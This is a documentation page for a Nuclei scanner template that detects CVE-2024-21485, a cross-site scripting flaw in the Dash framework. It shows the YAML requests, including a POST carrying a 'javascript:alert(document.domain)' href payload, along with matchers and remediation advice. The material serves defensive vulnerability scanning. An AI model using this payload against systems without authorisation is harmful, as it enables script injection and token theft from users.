Skip to content
Nuclei Templates

Dash Framework - Cross-site Scripting

ID: CVE-2024-21485

Severity: medium

Author: Lee Changhyun(eeche)

Tags: cve,cve2024,dash,xss

Description

Section titled “Description”

Dash framework versions before 2.15.0 are vulnerable to Cross-site Scripting (XSS) via href attribute in anchor tags. This template tests for javascript:alert payload injection.

YAML Source

Section titled “YAML Source”
id: CVE-2024-21485


info:
  name: Dash Framework - Cross-site Scripting
  author: Lee Changhyun(eeche)
  severity: medium
  description: |
    Dash framework versions before 2.15.0 are vulnerable to Cross-site Scripting (XSS) via href attribute in anchor tags. This template tests for javascript:alert payload injection.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21485
  impact: |
    Data theft from users who access the compromised view and Access token stealing allowing attacker to impersonate users
  remediation: |
    Upgrade to dash version 2.15.0 or later
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-21485
    cwe-id: CWE-79
    epss-score: 0.00103
    epss-percentile: 0.43330
    cpe: cpe:2.3:a:plotly:dash:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
  tags: cve,cve2024,dash,xss


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: body
        words:
          - "dash-core-components"
          - "_dash-component-suites"
        condition: or
        internal: true


  - raw:
      - |
        POST /_dash-update-component HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json


        {"output":"link-output.children","inputs":[{"id":"link-input","property":"value","value":"javascript:alert(document.domain)"}]}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "props"
          - "children"
          - "type"
          - "javascript:alert(document.domain)"
        condition: and


      - type: word
        part: content_type
        words:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b028db19ea909cb855b3ae4fb68acfde2e096cae2be8c91057aac94d8897e8a702202e8602f47f74c2cada9472862e77ddfbb80096a4734f18e146516981abe661b6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-21485.yaml"

View on Github